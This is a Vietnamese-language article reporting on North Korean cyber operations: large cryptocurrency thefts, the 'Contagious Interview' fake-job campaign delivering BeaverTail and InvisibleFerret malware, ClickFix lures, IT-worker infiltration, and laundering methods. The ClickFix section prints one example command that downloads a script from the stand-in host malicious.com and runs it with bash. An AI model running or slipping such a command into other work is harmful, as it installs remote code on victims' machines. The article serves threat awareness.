Mối đe dọa mạng Triều Tiên: Nguy hiểm từ tấn công, đánh cắp dữ liệu

Cộng hòa Dân chủ Nhân dân Triều Tiên (DPRK) đã tăng cường các hoạt động cyber trên toàn cầu, thể hiện mối đe dọa mạng nghiêm trọng thông qua các cuộc tấn công quy mô lớn. Các hoạt động này bao gồm đánh cắp tiền mã hóa và các kế hoạch rửa tiền xuyên biên giới, vi phạm có hệ thống các nghị quyết của Hội đồng Bảo an Liên Hợp Quốc.

Quy Mô và Tác Động của Mối Đe Dọa Mạng từ DPRK

Theo báo cáo của Nhóm Giám sát Các Lệnh Trừng phạt Đa phương (MSMT), các tin tặc Triều Tiên đã thực hiện các hành vi đánh cắp dữ liệu tiền mã hóa đáng kể. Tổng cộng, khoảng 1,19 tỷ USD tiền mã hóa đã bị đánh cắp trong năm 2024 và thêm 1,65 tỷ USD trong chín tháng đầu năm 2025. Con số này nâng tổng số tiền bị mất lên xấp xỉ 2,8 tỷ USD.

Khả năng tấn công mạng của DPRK đã đạt đến cấp độ gần như siêu cường. Nhiều nhóm Advanced Persistent Threat (APT) của quốc gia này đã thực hiện các cuộc tấn công phối hợp trên toàn ngành công nghiệp tiền mã hóa. Các hoạt động này được sử dụng để tài trợ cho chương trình vũ khí hủy diệt hàng loạt và tên lửa đạn đạo của chế độ.

Các Vụ Đánh Cắp Tiền Mã Hóa Lớn

Vụ xâm nhập vào sàn giao dịch Bybit có trụ sở tại Dubai vào tháng 2 năm 2025 đã dẫn đến việc đánh cắp gần 1,5 tỷ USD, trở thành vụ trộm tiền mã hóa lớn nhất trong lịch sử. Các nạn nhân đáng chú ý khác bao gồm DMM Bitcoin của Nhật Bản và WazirX của Ấn Độ.

Các nhà phân tích bảo mật từ SlowMist đã xác định rằng các tác nhân đe dọa của DPRK triển khai mã độc tinh vi thông qua các chiến dịch kỹ thuật xã hội. Các chiến dịch này thường được ngụy trang dưới dạng quy trình tuyển dụng việc làm.

Chiến dịch "Contagious Interview" và Kỹ thuật Tấn Công Mạng

Chiến dịch "Contagious Interview" đặc biệt nhắm mục tiêu vào các nhà phát triển phần mềm. Kẻ tấn công mời các mục tiêu tham gia các cuộc phỏng vấn trực tuyến và hướng dẫn họ tải xuống các gói phần mềm độc hại. Chiến dịch này thể hiện sự tinh vi trong việc khai thác điểm yếu con người để xâm nhập hệ thống.

Khi mã độc được thực thi, BeaverTail sẽ thu thập thông tin đăng nhập ví tiền mã hóa và dữ liệu thẻ tín dụng được lưu trữ trong trình duyệt. Đồng thời, mã độc này bí mật cài đặt backdoor InvisibleFerret để thiết lập quyền truy cập từ xa bền bỉ.

Kỹ thuật "ClickFix" trong Chuỗi Tấn Công

Chuỗi tấn công của DPRK thể hiện sự tinh vi về mặt kỹ thuật trong việc thiết lập foothold bên trong hệ thống mục tiêu. Khi nạn nhân truy cập các trang web phỏng vấn giả mạo, họ sẽ gặp các thông báo lỗi camera, yêu cầu tải xuống các driver giả mạo.

Kẻ tấn công sử dụng kỹ thuật "ClickFix" để lừa nạn nhân thực thi các lệnh độc hại. Phương pháp này lợi dụng sự tin tưởng của người dùng vào các thông báo lỗi hoặc hướng dẫn kỹ thuật.

• Đối với hệ thống macOS: Nạn nhân tải xuống và chạy một tập lệnh bash độc hại thông qua các lệnh curl.
• Đối với người dùng Windows: Họ nhận được một kho lưu trữ ZIP chứa một tập lệnh VBS để thực thi.

Ví dụ minh họa cho lệnh trên macOS:

curl -o /tmp/install.sh http://malicious.com/payload.sh && bash /tmp/install.sh

Thông tin chi tiết về các chiến dịch tương tự của các tác nhân Triều Tiên có thể được tìm thấy trong các cảnh báo từ các tổ chức uy tín. Tham khảo thêm về hoạt động sử dụng kỹ thuật xã hội để đánh cắp tiền mã hóa từ các tác nhân Triều Tiên tại CISA Cybersecurity Advisory.

Phân tích Mã độc BeaverTail và Backdoor InvisibleFerret

Mã độc BeaverTail được thiết kế để trực tiếp đánh cắp các thông tin tài chính nhạy cảm. Mục tiêu chính của nó là thu thập thông tin đăng nhập ví tiền mã hóa và chi tiết thẻ tín dụng đã lưu trữ trên các trình duyệt web của nạn nhân. Điều này cho phép kẻ tấn công nhanh chóng chiếm đoạt tài sản số của người dùng.

Backdoor InvisibleFerret thiết lập quyền truy cập bền bỉ bằng cách nhúng vào các quy trình hệ thống hợp pháp. Việc này cho phép kẻ tấn công duy trì khả năng giám sát lâu dài và đánh cắp dữ liệu nhạy cảm mà không kích hoạt cảnh báo bảo mật. Mã độc này giao tiếp với cơ sở hạ tầng command-and-control (C2) bằng các kênh được mã hóa, gây khó khăn cho các nhóm bảo mật trong việc phát hiện ở cấp độ mạng.

Các Thành phần Kỹ thuật Chính

• Chiến dịch: Contagious Interview
• Mã độc: BeaverTail (thu thập thông tin đăng nhập ví tiền mã hóa, thẻ tín dụng)
• Backdoor: InvisibleFerret (duy trì truy cập từ xa, giám sát, đánh cắp dữ liệu)
• Kỹ thuật: ClickFix (lừa nạn nhân thực thi lệnh)
• Mục tiêu: Các nhà phát triển phần mềm, ngành tiền mã hóa

Vai trò của Nhân viên IT DPRK trong Các Hoạt động Cyber

Bên cạnh các hoạt động tấn công mạng trực tiếp, các nhân viên IT của DPRK còn bổ trợ bằng cách xâm nhập vào các công ty trên toàn thế giới. Họ làm việc thông qua các nền tảng tự do (freelance) như Upwork, Freelancer và Fiverr. Đây là một khía cạnh khác của mối đe dọa mạng từ DPRK.

Các nhân viên này sử dụng khuôn mặt tổng hợp do AI tạo ra và các tài liệu giả mạo để vượt qua quy trình xác minh danh tính. Họ kiếm được mức lương trung bình 10.000 USD mỗi tháng, nhưng phải gửi phần lớn số tiền này về chế độ. Báo cáo của MSMT xác nhận việc triển khai nhân viên IT tại Trung Quốc, Nga, Lào và một số quốc gia châu Phi.

Quy trình Rửa tiền mã hóa tinh vi

Việc rửa số tiền mã hóa bị đánh cắp theo một quy trình đa giai đoạn, cực kỳ phức tạp để che giấu nguồn gốc. Quy trình này bao gồm các bước sau:

• Token Swaps: Thực hiện các giao dịch hoán đổi token thông qua các sàn giao dịch phi tập trung (DEX).
• Mixing Services: Sử dụng các dịch vụ trộn tiền mã hóa như Tornado Cash và Wasabi Wallet để che giấu dấu vết giao dịch.
• Blockchain Bridges: Chuyển tiền qua các cầu nối blockchain để di chuyển giữa các chuỗi khác nhau.
• Chuyển đổi sang tiền pháp định: Cuối cùng, chuyển đổi sang tiền pháp định (fiat currency) thông qua các nhà môi giới giao dịch phi tập trung (OTC brokers).

Cách tiếp cận có hệ thống này nhằm lách các lệnh trừng phạt quốc tế, tạo ra mối đe dọa mạng ngày càng leo thang đối với hệ sinh thái tài chính toàn cầu. Điều này đòi hỏi một phản ứng quốc tế phối hợp và mạnh mẽ để đối phó hiệu quả.